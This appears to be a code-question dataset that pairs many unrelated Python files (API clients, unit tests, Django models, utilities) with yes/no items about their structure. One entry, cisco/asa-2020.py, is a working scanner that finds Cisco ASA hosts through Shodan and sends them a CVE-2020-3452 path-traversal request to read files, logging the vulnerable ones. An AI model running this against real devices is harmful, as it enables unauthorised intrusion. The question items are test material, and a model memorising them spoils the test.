def test_refresh_tasks__fail(scheduler_post_response):
scheduler_post_response.raise_for_status.side_effect = requests.RequestException()
assert client.refresh_tasks() is False
def test_refresh_tasks__do_not_swallow_all_exceptions(scheduler_post_response):
scheduler_post_response.raise_for_status.side_effect = ValueError()
with pytest.raises(ValueError):
client.refresh_tasks()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | tests/unit/scheduler/test_client.py | jamespfennell/realtimerail |
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
base_url = 'https://api.coingecko.com/'
def __init__(self):
self.http_session = requests.Session()
def _get_price(self, url: str, name: str):
try:
response = self.http_session.get(url, timeout=10)
if not response.ok:
raise CannotGetPrice
# Result is returned with lowercased `token_address`
price = response.json().get(name)
if price and price.get('usd'):
return price['usd']
else:
raise CannotGetPrice(f'Price from url={url} is {price}')
except (ValueError, IOError) as e:
logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
raise CannotGetPrice from e
def get_price(self, name: str) -> float:
"""
:param name: coin name
:return: usd price for token name, 0. if not found
"""
name = name.lower()
url = urljoin(self.base_url,
f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
return self._get_price(url, name)
def get_token_price(self, token_address: ChecksumAddress) -> float:
"""
:param token_address:
:return: usd price for token address, 0. if not found
"""
token_address = token_address.lower()
url = urljoin(self.base_url,
f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
return self._get_price(url, token_address)
def get_ewt_usd_price(self) -> float:
return self.get_price('energy-web-token')
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | safe_transaction_service/tokens/clients/coingecko_client.py | vaporyorg/safe-transaction-service |
# Portfolio
def query_portfolio():
pass
# Positions
def query_open_positions():
pass
def has_open_position(symbol):
pass
def query_open_position_by_symbol(symbol):
pass
# Balances
def query_balance(asset):
pass
def query_balances():
pass
def query_balance_free(asset):
pass
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exclu... | 3 | trality_simulator/portfolio.py | ffavero/trality-simulator |
from __future__ import unicode_literals
import swapper
from django.db import models
from accelerator_abstract.models.accelerator_model import AcceleratorModel
class BaseProgramFamilyLocation(AcceleratorModel):
program_family = models.ForeignKey(
swapper.get_model_name(AcceleratorModel.Meta.app_label,
"ProgramFamily"),
on_delete=models.CASCADE)
location = models.ForeignKey(
swapper.get_model_name(AcceleratorModel.Meta.app_label,
"Location"),
on_delete=models.CASCADE)
primary = models.BooleanField()
class Meta(AcceleratorModel.Meta):
db_table = 'accelerator_programfamilylocation'
abstract = True
unique_together = ('program_family', 'location')
verbose_name = "Program Family Location"
verbose_name_plural = "Program Family Locations"
def __str__(self):
return "Location %s for %s" % (self.location, self.program_family)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
}... | 3 | accelerator_abstract/models/base_program_family_location.py | masschallenge/django-accelerator |
"""Define the common values and functions to run the tests."""
from pathlib import Path
from scrapd.core import constant
TEST_ROOT_DIR = Path(__file__).resolve().parent
TEST_DATA_DIR = TEST_ROOT_DIR / 'data'
TEST_DUMP_DIR = TEST_ROOT_DIR.parent / constant.DUMP_DIR
def load_test_page(page):
"""Load a test page."""
page_fd = TEST_DATA_DIR / page
return page_fd.read_text()
def load_dumped_page(page):
"""Load a dumped page."""
page_fd = TEST_DUMP_DIR / page
return page_fd.read_text()
def scenario_inputs(scenarios):
"""Parse the scenarios and feed the data to the test function."""
return [test_input[0] for test_input in scenarios]
def scenario_ids(scenarios):
"""Parse the scenarios and feed the IDs to the test function."""
return [test_input[1] for test_input in scenarios]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer":... | 3 | tests/test_common.py | scrapd/scrapd |
import pytest
from aiopg.sa.connection import _distill_params
pytest.importorskip("aiopg.sa") # noqa
def test_distill_none():
assert _distill_params(None, None) == []
def test_distill_no_multi_no_param():
assert _distill_params((), {}) == []
def test_distill_dict_multi_none_param():
assert _distill_params(None, {"foo": "bar"}) == [{"foo": "bar"}]
def test_distill_dict_multi_empty_param():
assert _distill_params((), {"foo": "bar"}) == [{"foo": "bar"}]
def test_distill_single_dict():
assert _distill_params(({"foo": "bar"},), {}) == [{"foo": "bar"}]
def test_distill_single_list_strings():
assert _distill_params((["foo", "bar"],), {}) == [["foo", "bar"]]
def test_distill_single_list_tuples():
v1 = _distill_params(([("foo", "bar"), ("bat", "hoho")],), {})
v2 = [('foo', 'bar'), ('bat', 'hoho')]
assert v1 == v2
def test_distill_single_list_tuple():
v1 = _distill_params(([("foo", "bar")],), {})
v2 = [('foo', 'bar')]
assert v1 == v2
def test_distill_multi_list_tuple():
v1 = _distill_params(
([("foo", "bar")], [("bar", "bat")]),
{})
v2 = ([('foo', 'bar')], [('bar', 'bat')])
assert v1 == v2
def test_distill_multi_strings():
assert _distill_params(("foo", "bar"), {}) == [('foo', 'bar')]
def test_distill_single_list_dicts():
v1 = _distill_params(([{"foo": "bar"}, {"foo": "hoho"}],), {})
assert v1 == [{'foo': 'bar'}, {'foo': 'hoho'}]
def test_distill_single_string():
assert _distill_params(("arg",), {}) == [["arg"]]
def test_distill_multi_string_tuple():
v1 = _distill_params((("arg", "arg"),), {})
assert v1 == [("arg", "arg")]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | tests/test_sa_distil.py | dduong42/aiopg |
#!/usr/bin/env python
#
# assa-2020.py
# Search SHODAN for Cisco ASA CVE-2020-3452
#
# Author: random_robbie
import shodan
import sys
import re
import requests
from time import sleep
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Configuration
API_KEY = "YOURAPIKEY"
SEARCH_FOR = 'webvpn port:"443"'
FILE = "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
session = requests.Session()
def filter_result(str):
str.strip() #trim
str.lstrip() #ltrim
str.rstrip() #rtrim
return str
def grab_file (IP,PORT,FILE):
print ("[*] Testing: "+IP+" on Port: "+PORT+"[*]\n")
try:
URL = "https://"+IP+":"+PORT+""+FILE+""
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
response = session.get(URL, headers=headers, timeout=15, verify=False)
result = response.text
if 'CONF_VIRTUAL_KEYBOARD' in result:
text_file = open("./cfg/vun.cfg", "a")
text_file.write(""+URL+"\n")
text_file.close()
print ("[*] Vun VPN ... Found [*]\n")
print (result)
else:
print ("[*] Not Vulnerable [*]\n ")
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print (e)
print ("[*] Nothing Found on IP: "+IP+" [*]\n")
try:
# Setup the api
api = shodan.Shodan(API_KEY)
# Perform the search
result = api.search(SEARCH_FOR)
# Loop through the matches and print each IP
for service in result['matches']:
IP = service['ip_str']
PORT = str(service['port'])
CC = service['location']['country_name']
grab_file (IP,PORT,FILE)
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
sys.exit(1)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"a... | 3 | cisco/asa-2020.py | phiberoptick/My-Shodan-Scripts |
import json
import os
from app import app
def invalid_file_error_response(data) -> json:
data = {"detail_error": 'File format not supported only supported are .jpeg and .png but received a' + ' ' + data}
response = app.response_class(
response=json.dumps(data),
status=400,
mimetype='application/json'
)
return response
def valid_error_response(label) -> json:
# flash({"Given class of image is ": label})
data = {"Given a class of image is ": label}
response = app.response_class(
response=json.dumps(data),
mimetype='application/json'
)
return response
def invalid_error_response(data) -> json:
data = {"detail_error": 'No file uploaded' + ' ' + data}
response = app.response_class(
response=json.dumps(data),
status=400,
mimetype='application/json'
)
return response
def db_timeout_error(data) -> json:
data = {"detail_error": 'Db timeout' + ' ' + data}
response = app.response_class(
response=json.dumps(data),
status=400,
mimetype='application/json'
)
return response
def invalid_model_path_response(data) -> json:
data = {"detail_error": 'Application can not find the trained as' + ' ' + data}
response = app.response_class(
response=json.dumps(data),
status=400,
mimetype='application/json'
)
return response
def invalid_method_response() -> json:
data = {"detail_error": "requested method service is not supported by the application"}
response = app.response_class(
response=json.dumps(data),
status=400,
mimetype='application/json'
)
return response
def remove_img(path, img_name) -> json:
os.remove(path + '/' + img_name)
# check if file exists or not
if os.path.exists(path + '/' + img_name) is False:
# file did not exists
return True
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
... | 3 | utils.py | rksingh95/prediction-service |
from load_data import LoadData
from check_solution import CheckSudoku
from brute_force.brute_force import BruteForce
from base_solver.solve_it_like_a_human import SolveItLikeAHuman
from genetic_algorithm.genetic_algorithm import GeneticAlgorithm
import numpy as np
import logging
logger = logging.getLogger('Sudoku Solver')
class SudokuSolver:
def __init__(self, path, dataset):
self.data_loader = LoadData()
self.path = path
self.dataset = dataset
self.sudoku_checker = CheckSudoku()
def run(self):
initial_matrix, solution = self.data_loader.load_data(self.path, self.dataset)
logger.info(f'Out of {(9 * 9) ** 9} possibilities this sudoku has {(9 * 9 - np.where(initial_matrix.flatten() == 0)[0].shape[0]) ** 9}')
logger.info(f'Thd number of filled number is {np.where(initial_matrix.flatten() == 0)[0].shape[0]} out of {9*9}')
# BruteForce(initial_matrix).run()
is_feasible, candidate_solution = SolveItLikeAHuman().run(initial_matrix)
# GeneticAlgorithm().run(initial_matrix)
self.sudoku_checker.is_correct(solution) # TODO: Check when is a good idea to use a @staticmethod
self.sudoku_checker.is_equal(candidate_solution, solution)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | src/sudoku_solver.py | Mai13/sudoku |
import constants
import frame_subscriber
import frame_receiver
# Income
def create_receiver():
receiver_port = constants.get_meta_frame_server_port()
return frame_receiver.FrameReceiver(port=receiver_port)
def create_subscriber():
subscriber_port = constants.get_meta_frame_server_port()
topic = constants.get_meta_frame_subscribe_topic()
if "" == topic:
subscriber = frame_subscriber.FrameSubscriber(port=subscriber_port)
else:
subscriber = frame_subscriber.FrameSubscriber(port=subscriber_port, topic=topic)
return subscriber
def create_taker():
taker = None
take_type = constants.get_meta_frame_take_type()
if constants.METADATA_FRAME_TAKE_TYPE_SUBSCRIBE == take_type:
taker = create_subscriber()
elif constants.METADATA_FRAME_TAKE_TYPE_RESPONSE == take_type:
taker = create_receiver()
if taker is None:
print("Invalid environment variables provided for video processor")
print("Variable %s must be %s or %s, exits" %
(constants.METADATA_FRAME_TAKE_TYPE_ENV_VAR_NAME, constants.METADATA_FRAME_TAKE_TYPE_RESPONSE,
constants.METADATA_FRAME_TAKE_TYPE_SUBSCRIBE))
return taker
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | video_processor/frame_comm.py | zhiyanliu/riverrun |
import pytest
import subprocess
from Browser.assertion_engine import AssertionOperator
@pytest.fixture()
def application_server():
process = subprocess.Popen(
["node", "./node/dynamic-test-app/dist/server.js", "7272"]
)
yield
process.terminate()
@pytest.fixture()
def browser(monkeypatch):
import Browser
browser = Browser.Browser()
yield browser
browser.close_browser("ALL")
def test_open_page_get_text(application_server, browser):
browser.new_page("localhost:7272/dist/")
text = browser.get_text("h1", AssertionOperator["=="], "Login Page")
assert text == "Login Page"
def test_readme_example(browser):
browser.new_page("https://playwright.dev")
assert browser.get_text("h1") == "🎭 Playwright"
def test_new_browser_and_close(browser):
browser.new_browser()
browser.close_browser()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | utest/test_python_usage.py | emanlove/robotframework-browser |
import pytest
from gene_finder.utils import get_neighborhood_ranges
def _build_hit_dictionary(coords):
hits = {}
for coord in coords:
key = "hit_{}_{}".format(coord[0], coord[1])
hits[key] = {}
hits[key]["Query_start-pos"] = coord[0]
hits[key]["Query_end-pos"] = coord[1]
return hits
@pytest.mark.parametrize('hit_coords,expected_num_neighborhoods,expected_ranges', [
([(1,500), (3500, 3600), (6000, 6500)], 3, [(0, 1500), (2500, 4600), (5000, 7500)]),
([(1,500), (600, 11400), (20000, 20250)], 2, [(0, 12400), (19000, 21250)]),
([(1,500), (500, 1000), (1000, 1500)], 1, [(0, 2500)]),
([(500, 1), (600, 11400), (20000, 20250)], 2, [(0, 12400), (19000, 21250)]),
([(1,500), (500,1), (400, 600)], 1, [(0, 1600)]),
([(1, 500), (400, 2)], 1, [(0, 1500)]),
([(1, 500), (400, 1100), (1101, 1200)], 1, [(0, 2200)]),
([(2500, 2000)], 1, [(1000, 3500)])
])
def test_get_neighborhood_ranges(hit_coords, expected_num_neighborhoods, expected_ranges):
hits = _build_hit_dictionary(hit_coords)
neighborhoods = get_neighborhood_ranges(hits, 100000, span=1000)
assert len(neighborhoods) == expected_num_neighborhoods
for nbh, expected_range in zip(neighborhoods, expected_ranges):
assert nbh == expected_range
@pytest.mark.parametrize('bait_ORF_coords,expected_last_range', [
([(6000, 6500)], (5000, 7500)),
([(1,500)], (0, 1500)),
([(98000, 99000)], (97000, 100000)),
([(98000, 99800)], (97000, 100000))
])
def test_get_neighborhood_ranges_bounds(bait_ORF_coords, expected_last_range):
"""
Test that `get_neighborhood_ranges` always reports candidate region coordinates
that are actually within the bounds of the parent contig.
"""
hits = _build_hit_dictionary(bait_ORF_coords)
neighborhoods = get_neighborhood_ranges(hits, contig_len=100000, span=1000)
assert neighborhoods[0] == expected_last_range
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | tests/test_gene_finder/test_utils.py | caacree/Opfi |
'''
Created on Oct 29, 2018
@author: riaps
'''
class Origin(object):
'''
RIAPS app origin - 'signature file
url = URL of the repo (or local folder) the app is coming from
host = host IP addares
mac = MAC address of host
sha = SHA of package
home = local source folder (used in remote debugging)
'''
def __init__(self,url,host,mac,sha,home):
self.url = url
self.host = host
self.mac = mac
self.sha = sha
self.home = home
def __repr__(self):
return "%s(url=%r, host=%r, mac=%r, sha=%r, home=%r)" % (
self.__class__.__name__, self.url, self.host, self.mac, self.sha, self.home)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | src/riaps/utils/origin.py | mbellabah/riaps-pycom |
class Soma:
def __init__(self):
self.numeroDeCartas = list()
def set_numeroDeCartas(self, numero):
if numero == '':
numero = '1'
numero = numero[:]
self.numeroDeCartas.extend(numero)
def get_numeroDeCartas(self):
return self.numeroDeCartas
def ConverterPInt(self, converter):
convertidos = []
for c in converter:
convertidos.append(int(c))
return convertidos
def Somar(self):
return sum(self.ConverterPInt(self.get_numeroDeCartas()))
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | 14-flashcardsContador/1-versaoTerminal/0-versoesAntigas/flashcardsContador2/Soma.py | jonasht/Python |
from typing import Any, Dict
import httpx
from ...client import Client
from ...models.a_form_data import AFormData
from ...types import Response
def _get_kwargs(
*,
client: Client,
form_data: AFormData,
) -> Dict[str, Any]:
url = "{}/tests/post_form_data".format(client.base_url)
headers: Dict[str, Any] = client.get_headers()
cookies: Dict[str, Any] = client.get_cookies()
return {
"url": url,
"headers": headers,
"cookies": cookies,
"timeout": client.get_timeout(),
"data": form_data.to_dict(),
}
def _build_response(*, response: httpx.Response) -> Response[Any]:
return Response(
status_code=response.status_code,
content=response.content,
headers=response.headers,
parsed=None,
)
def sync_detailed(
*,
client: Client,
form_data: AFormData,
) -> Response[Any]:
"""Post from data
Post form data
Returns:
Response[Any]
"""
kwargs = _get_kwargs(
client=client,
form_data=form_data,
)
response = httpx.post(
verify=client.verify_ssl,
**kwargs,
)
return _build_response(response=response)
async def asyncio_detailed(
*,
client: Client,
form_data: AFormData,
) -> Response[Any]:
"""Post from data
Post form data
Returns:
Response[Any]
"""
kwargs = _get_kwargs(
client=client,
form_data=form_data,
)
async with httpx.AsyncClient(verify=client.verify_ssl) as _client:
response = await _client.post(**kwargs)
return _build_response(response=response)
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"an... | 3 | end_to_end_tests/golden-record/my_test_api_client/api/tests/post_form_data.py | kmray/openapi-python-client |
from PIL import Image
import numbers
class RandomCrop(object):
def __init__(self, size, v):
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
self.size = size
self.v = v
def __call__(self, img):
w, h = img.size
th, tw = self.size
x1 = int(( w - tw)*self.v)
y1 = int(( h - th)*self.v)
#print("print x, y:", x1, y1)
assert(img.size[0] == w and img.size[1] == h)
if w == tw and h == th:
out_image = img
else:
out_image = img.crop((x1, y1, x1 + tw, y1 + th)) #same cropping method for all images in the same group
return out_image
class RandomHorizontalFlip(object):
"""Randomly horizontally flips the given PIL.Image with a probability of 0.5
"""
def __init__(self, v):
self.v = v
return
def __call__(self, img):
if self.v < 0.5:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
#print ("horiontal flip: ",self.v)
return img | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},... | 3 | api/utils/data_utils.py | wtomin/Multitask-Emotion-Recognition-with-Incomplete-Labels |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import contextlib
import os
@contextlib.contextmanager
def cwd(dirname):
"""A context manager for operating in a different directory."""
orig = os.getcwd()
os.chdir(dirname)
try:
yield orig
finally:
os.chdir(orig)
def iter_all_files(root, prune_dir=None, exclude_file=None):
"""Yield (dirname, basename, filename) for each file in the tree.
This is an alternative to os.walk() that flattens out the tree and
with filtering.
"""
pending = [root]
while pending:
dirname = pending.pop(0)
for result in _iter_files(dirname, pending, prune_dir, exclude_file):
yield result
def iter_tree(root, prune_dir=None, exclude_file=None):
"""Yield (dirname, files) for each directory in the tree.
The list of files is actually a list of (basename, filename).
This is an alternative to os.walk() with filtering."""
pending = [root]
while pending:
dirname = pending.pop(0)
files = []
for _, b, f in _iter_files(dirname, pending, prune_dir, exclude_file):
files.append((b, f))
yield dirname, files
def _iter_files(dirname, subdirs, prune_dir, exclude_file):
for basename in os.listdir(dirname):
filename = os.path.join(dirname, basename)
if os.path.isdir(filename):
if prune_dir is not None and prune_dir(dirname, basename):
continue
subdirs.append(filename)
else:
# TODO: Use os.path.isfile() to narrow it down?
if exclude_file is not None and exclude_file(dirname, basename):
continue
yield dirname, basename, filename
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/_util.py | qwertzy-antonio-godinho/dots |
from abc import ABC, abstractmethod
from typing import List
import numpy as np
class Ledger(ABC):
@abstractmethod
def get_next_batch_id(self) -> int:
"""Return next available batch id."""
@abstractmethod
def get_next_transaction_id(self) -> int:
"""Return next available transaction id."""
class PandasLedger(Ledger):
def get_next_batch_id(self) -> int:
try:
next_id = int(self.df["batch_id"].max()) + 1
except ValueError:
return 0
return next_id
def append(self, df) -> List[int]:
next_id = self.get_next_transaction_id()
ids = np.arange(start=next_id, stop=next_id + df.shape[0])
df["transaction_id"] = ids
self.df = self.df.append(df[self.columns], ignore_index=True, sort=False)
return list(ids)
def get_next_transaction_id(self) -> int:
try:
next_id = int(self.df["transaction_id"].max()) + 1
except ValueError:
return 0
return next_id
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer"... | 3 | ledger.py | HaeckelK/bookkeeping |
from sqlite3 import connect
cxn = connect("./files/database.db", check_same_thread=False)
cur = cxn.cursor()
def with_commit(func):
def inner(*args, **kwargs):
func(*args, **kwargs)
commit()
return inner
@with_commit
def build():
scriptexec("./files/script.sql")
def commit():
cxn.commit()
def close():
cxn.close()
def field(command, *values):
cur.execute(command, tuple(values))
if (fetch := cur.fetchone()) is not None:
return fetch[0]
def record(command, *values):
cur.execute(command, tuple(values))
return cur.fetchone()
def records(command, *values):
cur.execute(command, tuple(values))
return cur.fetchall()
def column(command, *values):
cur.execute(command, tuple(values))
return [item[0] for item in cur.fetchall()]
def execute(command, *values):
cur.execute(command, tuple(values))
def mutliexec(command, valueset):
cur.executemany(command, valueset)
def scriptexec(filename):
with open(filename, "r") as script:
cur.executescript(script.read()) | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"... | 3 | lib/db.py | sbshrey/twitch-bot-tutorial |
import os
import unittest
from typing import Dict
from kfai_env import Environment
from kfai_sql_chemistry.db.database_config import DatabaseConfig
from kfai_sql_chemistry.db.engines import SQLEngineFactory
def setUpModule():
os.environ['ENV'] = 'TEST'
def tearDownModule():
os.environ['ENV'] = ''
class CreateDbConnectionTest(unittest.TestCase):
def setUp(self):
e = Environment('./kfai_sql_chemistry/test/env')
e.register_environment("TEST")
e.load_env()
@unittest.skip("Skip until we run databases in github actions")
def test_registration_and_access(self):
database_map: Dict[str, DatabaseConfig] = {
"main": DatabaseConfig.from_local_env("main")
}
factory = SQLEngineFactory()
factory.create_all_engines(database_map)
engine = factory.get_engine("main")
with engine.connect() as conn:
print(conn.execute("SELECT 1").fetchall())
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | kfai_sql_chemistry/test/test_create_db_connection.py | krishisharma45/sql-chemistry |
import requests
def get_patient_data(patient_id):
res = requests.get(f'http://hapi.fhir.org/baseDstu3/Patient/{patient_id}/_history/1?_pretty=true&_format=json')
return res.json()
def get_data(id,
fhir_base='http://hapi.fhir.org/baseDstu3/',
fhir_resource='Patient/'):
res = requests.get(f'{fhir_base}{fhir_resource}{id}')
return res.status_code, res.json()
if __name__ == "__main__":
data = get_data(1627582)
print(type(data), len(data))
print(data[0], '\n')
print(data[1])
# print(type(data[0]), data[0])
# print(type(data[1]), data[1])
# status, data = get_data(1627582)
# print(status)
# print(data)
# print('Patient Data', patient_data, '\n')
# patient_data = get_data(1627582)
# print('Patient Data', patient_data, '\n')
# observation_data = get_data(445905, fhir_resource='Observation/')
# print('Observation Data', observation_data, '\n')
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | _site/lectures/Week 01 - Language basics, Generating Data, Storing Data/inclass-2019-05-23.py | BrianKolowitz/data-focused-python |
"""
Tools for interop with other libraries.
Check if libraries available without importing them which can be slow.
"""
import importlib.util
from typing import Any, Callable
# pylint: disable=import-outside-toplevel
class _LibChecker:
@property
def rasterio(self) -> bool:
return self._check("rasterio")
@property
def xarray(self) -> bool:
return self._check("xarray")
@property
def geopandas(self) -> bool:
return self._check("geopandas")
@property
def dask(self) -> bool:
return self._check("dask")
@property
def folium(self) -> bool:
return self._check("folium")
@property
def ipyleaflet(self) -> bool:
return self._check("ipyleaflet")
@staticmethod
def _check(lib_name):
return importlib.util.find_spec(lib_name) is not None
have = _LibChecker()
__all__ = ("have",)
def __dir__():
return [*__all__, "is_dask_collection"]
def __getattr__(name):
if name == "is_dask_collection":
if have.dask:
import dask
return dask.is_dask_collection
# pylint: disable=redefined-outer-name
def is_dask_collection(_: Any) -> bool:
return False
return is_dask_collection
raise AttributeError(f"module {__name__} has no attribute {name}")
is_dask_collection: Callable[[Any], bool]
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | odc/geo/_interop.py | opendatacube/odc-geo |
from django.shortcuts import render, get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Post
from .serializers import PostSerializer
class BlogListView(APIView):
def get(self, request, *args, **kwargs):
posts = Post.postobjects.all()[0:4]
serializer = PostSerializer(posts, many=True)
return Response(serializer.data)
class PostDetailView(APIView):
def get(self, request, post_slug, *args, **kwargs):
post = get_object_or_404(Post, slug=post_slug)
serializer = PostSerializer(post)
return Response(serializer.data)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?... | 3 | backend/blog/views.py | alexandersilvera/django-rest-blog |
# qubit number=4
# total number=44
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += CNOT(0,3) # number=13
prog += CNOT(0,3) # number=17
prog += X(3) # number=18
prog += RX(-3.1101767270538954,1) # number=27
prog += CNOT(0,3) # number=19
prog += CNOT(0,3) # number=15
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=12
prog += H(1) # number=26
prog += H(0) # number=5
prog += H(1) # number=6
prog += X(3) # number=29
prog += H(2) # number=7
prog += CNOT(3,0) # number=20
prog += H(0) # number=32
prog += CZ(3,0) # number=33
prog += H(0) # number=34
prog += CNOT(3,0) # number=41
prog += Z(3) # number=42
prog += CNOT(3,0) # number=43
prog += H(0) # number=38
prog += CZ(3,0) # number=39
prog += H(0) # number=40
prog += CNOT(3,0) # number=22
prog += H(3) # number=8
prog += CNOT(3,0) # number=35
prog += Z(3) # number=36
prog += CNOT(3,0) # number=37
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += X(1) # number=30
prog += X(1) # number=31
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil3332.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | benchmark/startPyquil3332.py | UCLA-SEAL/QDiff |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ..utils import Calc
def test_Calc_inputs():
input_map = dict(
args=dict(argstr='%s', ),
environ=dict(
nohash=True,
usedefault=True,
),
expr=dict(
